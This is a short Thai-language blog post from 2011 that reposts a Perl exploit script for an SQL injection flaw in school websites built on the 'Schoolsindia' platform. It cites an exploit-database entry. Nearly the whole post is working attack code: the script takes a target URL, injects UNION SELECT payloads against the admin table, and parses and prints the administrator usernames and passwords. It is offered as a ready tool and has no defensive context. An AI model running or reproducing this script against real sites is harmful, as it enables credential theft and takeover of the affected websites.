หน้าเว็บ

วันอังคารที่ 9 สิงหาคม พ.ศ. 2554

Powered By Schoolsindia SQL Injection Vulnerability [ Perl ]




use LWP::UserAgent;

print "[+] Powered By Schoolsindia SQL Injection Vulnerability\n";
print "[+] By ICheer_No0M\n\n";
print "[+] Input URL : ";
chomp($url=<stdin>);
print "[+] Input ID : ";
chomp($id=<stdin>);
$ids=$id-1;
$user="+and+1=2+union+all+select+1,2,concat(0x6963686565725f6e6f6f6d21,group_concat(user_name),0x236963686565725f6e6f6f6d),4,5,6,7,8,9+from+admin+limit+";
$pass="+and+1=2+union+all+select+1,2,concat(0x6963686565725f6e6f6f6d21,group_concat(pass_word),0x236963686565725f6e6f6f6d),4,5,6,7,8,9+from+admin+limit+";
$second=",1--";
$usertarget=$url.$user.$ids.$second;
$passtarget=$url.$pass.$ids.$second;
unless ($usertarget=~/^http:\/\//) {$usertarget='http://'.$usertarget;}
unless ($passtarget=~/^http:\/\//) {$passtarget='http://'.$passtarget;}
$get=LWP::UserAgent->new->get($usertarget)->content;
if($get =~ /icheer_noom!(.*)#icheer_noom/) 
{
print "[+] User : $1\n";
}
else
{
print "[-] Failed !!!\n";
}
$get2=LWP::UserAgent->new->get($passtarget)->content;
if ($get2 =~ /icheer_noom!(.*)#icheer_noom/)
{
print "[+] Password : $1\n";
print "[-] Finish !!!\n";
}
else
{
print "[-] Failed !!!\n";
print "[-] Finish !!!\n";
}
<stdin>;

Ref : http://www.1337day.com/exploits/16633

ไม่มีความคิดเห็น:

โพสต์ความคิดเห็น